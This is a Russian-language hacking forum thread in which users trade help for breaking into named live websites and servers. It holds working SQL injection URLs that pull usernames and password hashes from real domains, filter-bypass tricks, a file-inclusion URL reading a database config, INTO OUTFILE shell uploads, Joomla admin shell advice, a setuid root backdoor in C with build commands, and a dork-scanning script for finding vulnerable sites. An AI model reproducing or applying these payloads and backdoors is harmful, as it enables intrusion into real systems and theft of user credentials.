Не, не пашет.

http://gta.com.ua/files_search.phtml?keyword=asd&game=asd

Уязвимость?

нашол вот такую уязвимость

http://www.ftpinfo.ru/forum/index.php?showforum=4&prune_day=100&sort_by=Z-A&sort_key=22'

как ее использовать?

если ls выдает permission denied, как читать соделжаемое например /home? Где-то точно видел, но не помню, как-то через awk не помню...может Вы знаете?

man chmod

cd .. ; ls -l

и что это даст?

мне надо же читать папки где стоит chmod и у меня нету доступк к sudo например.

чо можно зделать имея доступ к phpmyadmin

boortyhuhtyu said:
чо можно зделать имея доступ к phpmyadmin


click here (https://antichat.live/threads/133925/)

а по сабжу..поиск рулит..

rootmd said:
и что это даст?
мне надо же читать папки где стоит chmod и у меня нету доступк к sudo например.


если ты ждешь постоянно все готовое и гугл и поиск на форуме для тебя слишком сложный процес, то думаю что тебе ничего не даст то что тебе написали выше и даннаы тема для тебя закрыта.

Сразу прошу прощения за тупой вопрос, но где собственно находятся хеши с логин пасс от мускула ?

select group_concat(User,0x3a,Password ) from mysql.user

//можно было пошариться по соседним темам

Seravin said:
select group_concat(User,0x3a,Password ) from mysql.user
//можно было пошариться по соседним темам


Да дело в том, что сайт то подключается к удаленной дб, хотя имеет свою, вот и хочется глянуть, что там. Из шелла глянуть как-то можно?

не понимаю суть проблемы. Ты знаешь хост удалённой дб, пароль, логин, так в чём проблема то?

Seravin said:
не понимаю суть проблемы. Ты знаешь хост удалённой дб, пароль, логин, так в чём проблема то?


Да, все знаю, коннект делаю, но нужных данных мне там нет, вот и думаю как сделать коннект к локалхосту? Не в одном исходнике сайта нет данных для коннекта к локалхосту ...

Seravin said:
не понимаю суть проблемы. Ты знаешь хост удалённой дб, пароль, логин, так в чём проблема то?


Он хочет всхекать локальную базу.

Его жертва подключается к удаленной БД, однако он думает (или знает), что на серваке жертвы (где у него шелл) также есть MySQL-сервер, к которому он хотел бы подключиться и всвязи с этим он хочет добыть логин и хеш пароля.

ну посмотри есть ли он на самом деле

а вообще я не понимаю, как ты к ней просто подключишься, не имея логина и пароля

Запрос типа: http://ххх.ххх.ххх.ххх/addon/bossmap/index.php/ выдает ошибку: http://img14.imageshack.us/img14/3292/42569748.gif (http://img14.imageshack.us/i/42569748.gif/)

Слеш в конце обязателен. Как такое получается и можно ли развить?

Wildking said:
Запрос типа: http://ххх.ххх.ххх.ххх/addon/bossmap/index.php/ выдает ошибку:
http://img14.imageshack.us/img14/3292/42569748.gif (http://img14.imageshack.us/i/42569748.gif/)
Слеш в конце обязателен. Как такое получается и можно ли развить?


посмотри постом что передается..

И еще вопрос-просьба. Кодом шела может кто располагает, для открытия порта под эксплоит "Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit" ?

как вывести информацию через xpatch injection там вроде в xml данные зранятся можно с примером

http://www.deva.ws/index.php?idAutor=-9+/*!union+select*/+1,2,concat(username,0x3a,user_email),4,5,6,7,8,9, 10++from+bluemc_forum.phpbb_users+limit+1,1--+&idCategorie=

так выводит нормально, как только в запросе ставлю слово user_password , запретка сразу срабатывает...пару таких запросов и бан по айпи...вроде не новичек , но вот как обойти хз..какие мысли?

Gorev said:
http://www.deva.ws/index.php?idAutor=-9+/*!union+select*/+1,2,concat(username,0x3a,user_email),4,5,6,7,8,9, 10++from+bluemc_forum.phpbb_users+limit+1,1--+&idCategorie=
так выводит нормально, как только в запросе ставлю слово user_password , запретка сразу срабатывает...пару таких запросов и бан по айпи...вроде не новичек , но вот как обойти хз..какие мысли?




http://www.deva.ws/index.php?idAutor=-9+user_password
Not Acceptable


http://www.deva.ws/index.php?idAutor=-9+/*!union+select*/+1,2,concat(username,0x3a,/*!user_password*/),4,5,6,7,8,9, 10++from+bluemc_forum.phpbb_users+limit+1,1--+&idCategorie=

Допустим есть сайт который стоит на одной базе mysql, а цмска стоит на другой к примеру cms.mysql можноли как нить при мускль иньекции с бд user.mysql выдернуть таблици с cms.mysql

если я правильно понимаю, то:

1) структуру базы тащим так: union+select+1,2,group_concat(table_name)+from+inf ormation_schema.tables+where+table_schema='имя базы'

2) тянем данные так: union+select+1,2,group_conact(login,0x3a,pass)+fro m+database_name.table_name

Seravin said:
если я правильно понимаю, то:
1) структуру базы тащим так: union+select+1,2,group_concat(table_name)+from+inf ormation_schema.tables+where+table_schema='имя базы'
2) тянем данные так: union+select+1,2,group_conact(login,0x3a,pass)+fro m+database_name.table_name


это подействует в случае когда конкретно уже знаем какие таблици в базе и поля, знаю что точно есть другая база, как можно с одной просмотреть какие есть таблици и поля в другой базе, для примера:

_http://www.indiagatebkk.com/menudetails.php?id=-8+union+select+1,concat_ws(0x3b,version(),database (),user()),3,4,concat_ws(0x3a,name,password)+from+ users--

а админка на WP:

_http://www.indiagatebkk.com/blog/wp-login.php

там одна база

http://www.indiagatebkk.com/menudetails.php?id=-8+union+select+1,2,3,4,group_concat%28schema_name% 29+from+information_schema.schemata--

грамотней попытайся задать вопрос

можно узнать куки через XSS иньекцию если стоит HTTPOnly флаг?

подскажите,

_http://www.kemtipp.ru/news.php?id=152' здесь чтот выжать можно? чет у меня запросы не проходят

на тебе,

ht_tp://www.kemtipp.ru/show.php?f=../../../../var/www/default/mysql_data.php

Можно ли обойти эту авторизацию? Яваскрипт практически не знаю...

И почему value постоянно пустая? И сравнивается с пустой...


PHP:
functionvalidate_auth(frm) { varvalue=''; � � varerrFlag= new Array(); var_qfGroups= {};_qfMsg='';value=frm.elements['login'].value; if (value==''&& !errFlag['login']) {errFlag['login'] =true;_qfMsg=_qfMsg+'\n - Введите логин'; }value=frm.ele ments['pass'].value; if (value==''&& !errFlag['pass']) {errFlag['pass'] =true;_qfMsg=_qfMsg+'\n - Введите пароль'; } if� �(_qfMsg!='') {_qfMsg='Форма заполне на неправильно:'+_qfMsg;_qfMsg=_qfMs g+'\n';alert(_qfMsg); returnfalse; } returntrue; }//]]>

если чтото в яваскрипте то ты его можешь просто отключить, но бегло просмотрев там проверяется только введен ли логин/пасс или нет

Ну да, ведь паса нет. Отключать тоже пробовал, вместо логина паса значение логина и паса становится _qfMsg.

Всеравно, спасибо)

как в blind sql injection проверить длину слова т.е. сколько символов содержит?

noviyuser said:
как в blind sql injection проверить длину слова т.е. сколько символов содержит?


1+and+length(@@version)=16

если версия содержит 16 символов вернет true

Redwood said:
1+and+length(@@version)=16
если версия содержит 16 символов вернет true


спс а как узнать длину таблицы любой?

/**/and/**/length(select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1)=16--

так не работает

noviyuser said:
спс а как узнать длину таблицы любой?
/**/and/**/length(select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1)=16--
так не работает


1+and+(select+length(table_name)+from+information_ schema.tables+limit+0,1)=14

Слил mysql дамп табдици юзеров, а как можно снеё выдернуть только нужные колонки и сохранит в формате user;mail;pass?

ну надо уточнять сначала чем сливал

Seravin said:
ну надо уточнять сначала чем сливал


слил через php шелл, SQL Dump created by P.A.S.

сливает в таком формате:


INSERT INTO `users` VALUES ('127','2000-11-08','0000-00-00','0000-00-00','Eva Benne','W?chtersbach','63607','76','Webmaster@drea ms-of-tomorrow.de','','Deutsch, Englisch, Franz?sisch','','aef0f4905f971bd0956107d3e2a30e68' ,'','','','','','','','0000-00-00','0','0','0');

я бы сделал слегка поизвращенски:

1) восстановил бы таблицу на локалке

2) сделал чтото типа такого запроса:

SELECT group_concat(username,password separator '\n\r') FROM `jos_users` into outfile 'C:/1111.txt'

Seravin said:
я бы сделал слегка поизвращенски:
1) восстановил бы таблицу на локалке
2) сделал чтото типа такого запроса:
SELECT group_concat(username,password separator '\n\r') FROM `jos_users` into outfile 'C:/1111.txt'


спасибо, твой метод лудше подошел чем прога тока с запросом:


SELECT concat_ws(0x3a,name,password,icq,'\n\r') FROM `users` into outfile 'C:/1111.txt'

Как заливается шелл в Joomla?

5.0.45-community-nt:root@localhost:Win32

Доступ к админке есть.

FlaktW said:
Как заливается шелл в Joomla?

5.0.45-community-nt:root@localhost:Win32
Доступ к админке есть.


если нет ограничений в виде прав на папки то в установке модулей либо ставишь xplorer ..либо сразу шелл льешь..даже если ошибка будет..он по идее должен залится

пожалуйста у кого есть машина под линуксе с перлом сгенерируете для меня хеш пароля 123456


Code:
#!/usr/bin/perl
################################################## ##############################
# Generate an MD5 hash for a string.
# Created to allow me to set a blank Linux password. Required this to create
# multiple VsFTP accounts with anonymous style credientials.
#
# If all you want is the MD5 Hash for NULL (blank password) here's one...
# $1$VNMbpxGH$sew7cnwH9ixU.x27UbFNn.
#
# Advice: If replacing a Linux password with a blank string, ensure you give
# the user a shell of /sbin/nologin as you wouldn't want them to login!
################################################## ##############################
# Load dependancies...
# perl -MCPAN -e 'install Crypt::PasswdMD5'
################################################## ##############################

use strict;
use Crypt::PasswdMD5 qw(unix_md5_crypt);
my @salt = ( '.', '/', 0 .. 9, 'A' .. 'Z', 'a' .. 'z' );
my %encrypted;

sub abort {
print "ABORT: $_[0]\n";
exit 1
}

sub gensalt { #------------------------------------------------------------
# uses global @salt to construct salt string of requested length
my $count = shift;

my $salt;
for (1..$count) {
$salt .= (@salt)[rand @salt];
}

return $salt;
} # end gensalt

sub get_encryptedpw { #--------------------------------------------------
my $unencrypted="$_[0]";

# generate traditional (weak!) DES password, and more modern md5
$encrypted{des} = crypt( $unencrypted, gensalt(2) );
$encrypted{md5} = unix_md5_crypt( $unencrypted, gensalt(8) );

return %encrypted;
}

################################################## ##############################
print "Enter password string to encrypt (can be blank) : ";
my $password = ;
chomp $password;

get_encryptedpw($password);

print "Plaintext \"$password\" = MD5 Hash: $encrypted{md5}\n";
print "\nReplace the /etc/shadow password string with the above to force pass change\n";

спасибки!

rootmd said:
пожалуйста у кого есть машина под линуксе с перлом сгенерируете для меня хеш пароля 123456

Code:
code here

спасибки!


Active perl тебе о чeм то говорит? или ты думаешь что все кто перл юзают, под линухой? погуглить не судьба?

rootmd

$1$iNOGSuEU$lBBSIh0tbH52kf77uy4yX/

а вообще тебе сюда (http://www.insidepro.com/hashes.php)

спасибо

а вот трабла

порутил сервер, uid=0, gid=0, sh-3.2, доступк по телнету (bind port). я смог открыть порт ssh, но не могу понять почему не получается зайти. (добавил пользователь и вручную ставил хеш в /etc/shadow)...authentication failure....не знаю?!

rootmd said:
спасибо
а вот трабла
порутил сервер, uid=0, gid=0, sh-3.2, доступк по телнету (bind port). я смог открыть порт ssh, но не могу понять почему не получается зайти. (добавил пользователь и вручную ставил хеш в /etc/shadow)...authentication failure....не знаю?!


а зачем ты так палишся на серванте то? зачем новый юзверь..., подрубайся к северу через бекдор, если же он упал .создай себе лазейку..сначала сделай файл

root.с:

Код:


Code:
main() {
setuid(0);
setgid(0);
system("/bin/bash");
}

Далее

Код:


Code:
gcc root.c -o syser
chmod 755 syser
chmod +s syser
mv syser /bin/syser

если бекдор закрылся, запускай из шелла заново и запускай :

Код:


Code:
$ /bin/syser
id
uid=0(root) gid=0(wheel) groups=0(wheel),80(www),1003(suwww)

та проблема в том что у меня шелла нету....нету доступк ssh!

rootmd said:
та проблема в том что у меня шелла нету....нету доступк ssh!


раз ты "порутил" сервак, значит доступ у тебя к нему есть...какая проблема залить шелл (если веб-сервак) или bindport.pl и запустить?

так пхп шелл я давно залил, делал bindport, подключился (telnet), порутил. и как дальше доступк к ssh получить?

rootmd said:
так пхп шелл я давно залил, делал bindport, подключился (telnet), порутил. и как дальше доступк к ssh получить?


ей Богу тебя не понимаю я...зачем тебе ssh ? какая разница что консоль у тебя на 22 или на 31337 порту?

ой разница большая, на 11457 порту шелл не bash а sh, нету TERM терминала, а это ограничает мой возможности (например passwd не могу выполнить потому-что он не ждет пока я пасс напишу а уже пишет "Retype unix password")

и разные Pseudo-terminal will not be allocated because stdin is not a ...

rootmd said:
ой разница большая, на 11457 порту шелл не bash а sh, нету TERM терминала, а это ограничает мой возможности (например passwd не могу выполнить потому-что он не ждет пока я пасс напишу а уже пишет "Retype unix password")
и разные Pseudo-terminal will not be allocated because stdin is not a ...


не знаю..у меня все работает..

Здравствуйте. Есть некий сайт, там присутствует local file inclusion, которая дописывает расширение .php. В чем вопрос, знаю можно попытаться отбросить нуль байтом, но когда я пытаюсь это сделать ничего не происходит, еще слышал о 4096 слешах, но даже при их добавлении пишет "Failed opening путь/passwd//////[много слешей]", без расширения. Подскажите пожалуйста что делать.

Есть раскрученная инъекция, получил login:hash из mysql.user (хэш не могу сбрутить), mysql из под root, есть конфиг апача и etc/passwd (только пасов в нем нет).

Какие сейчас есть варианты получения шела?

Есть раскрученная инъекция, получил login:hash из mysql.user (хэш не могу сбрутить), mysql из под root, есть конфиг апача и etc/passwd (только пасов в нем нет).
Какие сейчас есть варианты получения шела?


Проверь файловые привилегии, и залей шелл через скуль.

/Montana said:
Есть раскрученная инъекция, получил login:hash из mysql.user (хэш не могу сбрутить), mysql из под root, есть конфиг апача и etc/passwd (только пасов в нем нет).
Какие сейчас есть варианты получения шела?



select ' into outfile '(найди путь к папки где стоит права 777)'

Vollkorn said:
Проверь файловые привилегии, и залей шелл через скуль.


Можешь поподробнее описать, как проверить привелегии и как правильно составить запрос.

Дира где находиться сайт /home/.sites/site1/

раскажите про xpatch injection?

boortyhuhtyu said:
раскажите про xpatch injection?


клац (http://lmgtfy.com/?q=xpath+injection)

Помогите определить версию БД.

http://www.menupix.com/losangeles/restaurants.php?id=-204431+%6f%72%64%65%72+by+3+--+

Code:
http://www.menupix.com/losangeles/restaurants.php?id=1+and+%28select*from%28select%2 0name_const%28version%28%29,1%29,name_const%28vers ion%28%29,1%29%29a%29

Seravin said:

Code:
http://www.menupix.com/losangeles/restaurants.php?id=1+and+%28select*from%28select%2 0name_const%28version%28%29,1%29,name_const%28vers ion%28%29,1%29%29a%29



Как вывести имя юзера?

FlaktW said:
Как вывести имя юзера?




Code:
http://www.menupix.com/losangeles/restaurants.php?id=-204431+or+1+group+by+concat(user(),floor(rand(0)*% 202))having+min(0)+or+1

Фараон said:

Code:
http://www.menupix.com/losangeles/restaurants.php?id=-204431+or+1+group+by+concat(user(),floor(rand(0)*% 202))having+min(0)+or+1



Каким запросом можно вывести название таблиц?

http://www.menupix.com/losangeles/restaurants.php?id=-204431+or+1+group+by+concat((SELECT+TABLE_NAME+FRO M+INFORMATION_SCHEMA.TABLES+LIMIT+0,1)),floor(rand (0)*%202))having+min(0)+or+1

http://www.menupix.com/losangeles/restaurants.php?id=-204431+or+1+group+by+concat((select+table_name+fro m+information_schema.`tables`+limit+1),floor(rand( 0)*2))having+min(0)+or+1

Ребят вытянул дб, сделал экспорт на локалхост, в таблицах есть строки, как сделать сортировку, чтобы повторных значений не было? например строка id_user ...

select distinct id_user from....

Можешь поподробнее описать, как проверить привелегии и как правильно составить запрос.
Дира где находиться сайт /home/.sites/site1/


Тебе ж уже вроде написали.

http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php' --

А вообще читай /thread43966.html

Vollkorn said:
Здравствуйте. Есть некий сайт, там присутствует local file inclusion, которая дописывает расширение .php. В чем вопрос, знаю можно попытаться отбросить нуль байтом, но когда я пытаюсь это сделать ничего не происходит, еще слышал о 4096 слешах, но даже при их добавлении пишет "Failed opening путь/passwd//////[много слешей]", без расширения. Подскажите пожалуйста что делать.


Этот метод работает не везде.

https://forum.antichat.net/thread98525.html

ребят такой вопрос, вообщем на одном сайте нашёл скуль инж (_http://www.bittu.org.ru//comtech/?q=node/21), формируется в методом POST если в если в поле логин ввести ковычку, выводит warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/local/www/data/aptech/includes/common.inc(1547) : eval()'d code on line 42.

я не очень понимаю в инъекциях, точнее нихрена я не понимаю, помогите плз! каким образом мне вообще формировать запросы к БД, авторизациями?

P.S если есть какой нибудь добрый дядька кто проконсультирует в этом вопросе, милости прошу icq 3300890.

подобрал число колонок на PostgreSQL (PostgreSQL 8.1.11 on i686-pc-linux-gnu)

1+union+select+null,null,null,null,null,null,null, null,null,null,null+--+

сделал

1+union+select+table_name,table_name,table_name,ta ble_name,table_name,table_name,table_name,table_na me,table_name,table_name,table_name+from+informati on_schema.tables+--+

пишет

Query failed: ERROR: UNION types integer and character varying cannot be matched in

Как обойти?

ты сначала вывод определи в какой колонке идет..потом уже запрос делай, и еще все зависит от версии постгре...в новых есть INFORMATION_SCHEMA.TABLES а в старых пользуйся PG_TABLES

noviyuser said:
пишет
Query failed: ERROR: UNION types integer and character varying cannot be matched in


Это несовпадение типов данных, вывод напрашивается сам по себе.

Gorev said:
ты сначала вывод определи в какой колонке идет..потом уже запрос делай, и еще все зависит от версии постгре...в новых есть INFORMATION_SCHEMA.TABLES а в старых пользуйся PG_TABLES


в том то и проблема что не могу определить какое поле выводится, если null,null,null то все нормально а если числовое значение делаю т.е. 1,2,3 и т.д. ошибку выводит

cast(table_name+as+int) тоже не канает

Тип колонки вам придется подбирать вручную типа


Code:
select field1::int, field2::text from ...

и искать текстовое поле для вывода.

ЗЫ. Со статьей /thread35599.html ознакомились?

noviyuser

работа с постгрес, немного отличается, не всегда требуется подобрать колонки, можно просто составить запрос id=1+and+1=value

постгре тоже любит подзапросы

Как обойти защиту на сервере от изменения файлов?

Заливаю шелл он удаляется через неск минут, или изменяю любой файл, и через пару минут он откатуется!

возможно это автоматический бекап, или админ не спит там

вариант то что протроянить скрипты прям из бекапа, если конечно есть права не бекапанные файлы, пробуй найти их

А если вот посты там создаются или еще что то, оно ж не будет делать бекап?

адмни отпадает

Просто рес очень жирный во всех планах.

посты сохраняются в базе данных а не в скриптах

лучше прям забиндится, и нормально анализировать систему

Если кому нибуть не в лом, из знатоков, прошу объяснить новичку элементарную вещь.

При простом заросе в базу данных типа:

$db=mysql_query("SELECT * FROM table WHERE id='$_GET['id']' ");

$db=mysql_fetch_array($db);

и при вводе в url адреса http://site.ru/index.php?id=1' выдает ошибкуWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in...

...и дальше не идет...

тоесть при вводе http://site.ru/index.php?id=1'+order+by+1--

все равно выдает ошибку...

Казалось бы золотая sql'ka, но разобратся с этим ни как не могу.

Заранее спс!

asql said:
Если кому нибуть не в лом, из знатоков, прошу объяснить новичку элементарную вещь.
При простом заросе в базу данных типа:
$db=mysql_query("SELECT * FROM table WHERE id='$_GET['id']' ");
$db=mysql_fetch_array($db);
и при вводе в url адреса http://site.ru/index.php?id=1' выдает ошибкуWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in...
...и дальше не идет...
тоесть при вводе http://site.ru/index.php?id=1'+order+by+1--
все равно выдает ошибку...
Казалось бы золотая sql'ka, но разобратся с этим ни как не могу.
Заранее спс!


http://site.ru/index.php?id=1'+order+by+1+--+

asql said:
Если кому нибуть не в лом, из знатоков, прошу объяснить новичку элементарную вещь.
При простом заросе в базу данных типа:
$db=mysql_query("SELECT * FROM table WHERE id='$_GET['id']' ");
$db=mysql_fetch_array($db);
и при вводе в url адреса http://site.ru/index.php?id=1' выдает ошибкуWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in...
...и дальше не идет...
тоесть при вводе http://site.ru/index.php?id=1'+order+by+1--
все равно выдает ошибку...
Казалось бы золотая sql'ka, но разобратся с этим ни как не могу.
Заранее спс!


При твоем варианте должно быть MQ = Off.

Если такое имеется, то

http://site.ru/index.php?id=1'+order+by+1+--+ то есть запрос становиться таким SELECT * FROM table WHERE id='' order by 1+--+

Если mq = on - ничего не получиться. получиться так:

"SELECT * FROM table WHERE id='\' union select ...' и инъекции не будет. Как говорил Dr.Z3r0


1)САМОЕ ГЛАВНОЕ ФИЛЬТРОВАТЬ КАВЫЧКИ.
-------------------------------
2)Если используется оператор сравнения строк LIKE фильтровать знаки “%” и “_”
-------------------------------
3)Не использовать при сравнении прерменных без кавычек типа SELECT …WHERE id=$id а использовать так SELECT ...WHERE id='$id' и обратиться к пункту 1

Подскажите как залить шелл через админку в Gallery 2.2 (http://gallery.menalto.com/)

asql said:
Если кому нибуть не в лом, из знатоков, прошу объяснить новичку элементарную вещь.
При простом заросе в базу данных типа:
$db=mysql_query("SELECT * FROM table WHERE id='$_GET['id']' ");
$db=mysql_fetch_array($db);
и при вводе в url адреса http://site.ru/index.php?id=1' выдает ошибкуWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in...
...и дальше не идет...
тоесть при вводе http://site.ru/index.php?id=1'+order+by+1--
все равно выдает ошибку...
Казалось бы золотая sql'ka, но разобратся с этим ни как не могу.
Заранее спс!


Не знаю, что и куда ты там вводишь, но твой скрипт даже не запуститься, потому что он синтаксически неверен.

Правильно:


PHP:
$db=mysql_query("SELECT * FROM table WHERE id=' ".$_GET['id']." ' ");

$db=mysql_fetch_array($db);



Эксплуатация:


HTML:
1' order by 1,2,3,4,5,6,7,8,9,10-- a

И так далее.

Ну и magic_quotes должны быть off соответственно.

1' order by 1,2,3,4,5,6,7,8,9,10-- a

а 'a' на конце зачем?

asql said:
1' order by 1,2,3,4,5,6,7,8,9,10-- a
а 'a' на конце зачем?


Не важно, что там стоит, я просто показал, что после знака комментария должен стоять пробел.

Warning: include(/var/www/xxxx.com/1\'.php) [function.include]: failed to open stream: No such file or directory in /var/www/xxx/index.php on line 34

Warning: include() [function.include]: Failed opening '/var/www/xxxxx.com/1\'.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/xxxx.com/index.php on line 34

что ето за ошибка обьесните плиз и чт можно зделать?

boortyhuhtyu said:
Warning: include(/var/www/xxxx.com/1\'.php) [function.include]: failed to open stream: No such file or directory in /var/www/xxx/index.php on line 34
Warning: include() [function.include]: Failed opening '/var/www/xxxxx.com/1\'.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/xxxx.com/index.php on line 34
что ето за ошибка обьесните плиз и чт можно зделать?


local file include (LFI )

Народ помогите разобраться стакой скулей:

_http://www.ad1.us/links.php?cat_id=58&cat_name=Web%20Resources&siteid=-9+union+select+1,2,3-- //выводит Error processing request

но при group by оприделилось три поля, как понимаю тут фильтрация, и подскажите где можно статейку о более сложных скулях почитать...

winstrool said:
Народ помогите разобраться стакой скулей:
_http://www.ad1.us/links.php?cat_id=58&cat_name=Web%20Resources&siteid=-9+union+select+1,2,3-- //выводит Error processing request
но при group by оприделилось три поля, как понимаю тут фильтрация, и подскажите где можно статейку о более сложных скулях почитать...


там стоит фильтрация или фаервол какой-нибудь, так что нужно знать как обходить эти фильтры. Тема поднималась сто раз, так что ищем. Ну я думаю если найдёшь и обойдёшь, то узнаешь что там несколько запросов на странице, значит нужен вывод через ошибку, так что ищем сразу же вывод через ошибку

winstrool said:
Народ помогите разобраться стакой скулей:
_http://www.ad1.us/links.php?cat_id=58&cat_name=Web%20Resources&siteid=-9+union+select+1,2,3-- //выводит Error processing request
но при group by оприделилось три поля, как понимаю тут фильтрация, и подскажите где можно статейку о более сложных скулях почитать...


обходится спокойно, но через юнион селект не крутится

http://www.ad1.us/links.php?cat_id=58&cat_name=Web%20Resources&siteid=9+/*!union*/+select+1,2,3

так что error based

http://www.ad1.us/links.php?cat_id=58&cat_name=Web%20Resources&siteid=9+or+1+group+by+concat+(version(),floor(ran d(0)*2))having+min(0)+or+1

есть ли на ломаемых хостах какая нить альтернатива gcc

подскажите если при подставлении кавычки скажем

something.php?blabla=asd' показывает страницу something.php как эту уязвимость эксплуатировать?

а с чего ты взял что там уязвимость?

где в cms bitrix найти адрес сайта в бд и в какой таблице или php файле хранится? (наподобие как в жумла в configuration.php есть адрес сайта)

WebSite CMS v.2.01 кто знает как залить шелл в этой кмс?

http://politec.ru/country.asp?id=2'

возможно ли обойти фильтрацию?

Яндекс тИЦ 1100

Яндекс Rank 5/6

так к слову....

Мб поздно отвечаю, но раньше не мог...


foozzi said:
нашол вот такую уязвимость
http://www.ftpinfo.ru/forum/index.php?showforum=4&prune_day=100&sort_by=Z-A&sort_key=22'
как ее использовать?


После ордер бай

http://www.ftpinfo.ru/forum/index.php?showforum=4&prune_day=100&sort_by=Z-A&sort_key=2 DESC limit 0,1-- 1

http://www.ftpinfo.ru/forum/index.php?showforum=4&prune_day=100&sort_by=Z-A&sort_key=2 DESC limit 0,10-- 1


Фараон said:
Как говорил
Dr.Z3r0


В данном примере фильтровать вообще ничего не нунжно, достаточно преобразовывать в целочисленное значение.



И да, тебе отдельный привет за слитие скуль из приватов других проэктов, ну ты понял.

Ну и как написал выше Redwood там был нарушен синтаксис=/


Redwood said:
Эксплуатация:

HTML:
1' order by 1,2,3,4,5,6,7,8,9,10-- a



Зачем сортировать перебирая все колонки, если можно сразу указать максимальную?

asql said:
http://politec.ru/country.asp?id=2'
возможно ли обойти фильтрацию?
Яндекс тИЦ 1100
Яндекс Rank 5/6
так к слову....



Это не фильтрация, это ошибка в приведении типов данных

Ребят, первый раз с таким сталкиваюсь и не могу в пост запросе подобрать кол-во полей, все перепробовал пробелы на + /* %20 заменяю ничего понять не могу выдает


Code:
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 2

Что делать?

это очень на insert похоже

Помогите вывести версию БД.

http://www.courthouseforum.com/forums/view.php?id=1060181'+%6f%72%64%65%72+by+2+--+

FlaktW said:
Помогите вывести версию БД.
http://www.courthouseforum.com/forums/view.php?id=1060181'+%6f%72%64%65%72+by+2+--+


http://www.courthouseforum.com/forums/view.php?id=1060181'+and%20mid(version(),1,1)=5+--+

Вот еще нашел сскулю с выводом. В другом скрипте.

http://www.courthouseforum.com//forums/directory.php?type=judges&state=8617%20and%201!=1%20union%20select%201,versi on(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22

2Seravin

Можно пару толковых линков по эксплуатации sql inj в инсерт?

не помню, смотри в статьях, заодно пока будешь смотреть найдёшь кучу полезного для себя

Lijzer said:
2Seravin
Можно пару толковых линков по эксплуатации sql inj в инсерт?


Выходишь за пределы инсерта values и делаешь подзапрос, остальное рубишь комментом, самое простое.

Lijzer, информация к размышлению:


Code:
insert ... values (...) on duplicate key update parent_name = (select 1 from (select count(*), concat(version(), floor(rand(0) * 2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.0.771' for key 1

есть ли сканеры по доркам, актуальные на данный момент?

вот, так сказать, в ознакомительных целях скрипт написанный за пару минут(парсинг гугла откуда то с ачата)


Code:
]*[Hh][Rr][Ee][Ff][^=]*=[ '\"\n\r\t]*([^ \"'>\r\n\t#]+)[^>]*>/",$html,$a);
for($x=0; $x 0)
//$str = substr($str, 0, $end);
if(strpos($been, str_replace('www.','',$str)) === false)
{
$been .= $str . '+';
$url = 'http://'.$str;
if (strpos($url,'?')!==false) {
$u = parse_url($url);
$s = '';
if (preg_match_all('#(.*?)&#',$u['query'],$q)) {
foreach ($q[1] as $t) $s.=$t."'&";
$s.=substr($u['query'],strrpos($u['query'],'&')+1,strlen($u['query']))."'";
}
else $s = $u['query']."'";
$page = file_get_contents($url);
$page1 = file_get_contents($u['scheme'].'://'.$u['host'].'/'.$u['path'].'?'.$s);
if ($page!==$page2) fputs($f1,$str."\n");
}
}
}
}
Sleep(45);
}
}
flose($f1);
flose($f);
?>

Ребят поставил metasploit framework, захожу в консоль пишу

msf > db_connect db_connect msf3:55adaf65@127.0.0.1:5432

в ответ

[-] Error while running command db_connect: Failed to connect to the database: could not connect to server: Connection refused (0x0000274D/10061)

Is the server running on host "127.0.0.1" and accepting

TCP/IP connections on port 5432?

Что делать?

p.s. имя юзера и пасс брал /config/database.yml, проштудировал гугл ответа не нашел.

>>> разобрался, ответ нашел тут http://forums.enterprisedb.com/posts/list/1961.page

есть какие-нибудь проги для упрощения Blind PostgreSQL инъекций?

Seravin said:
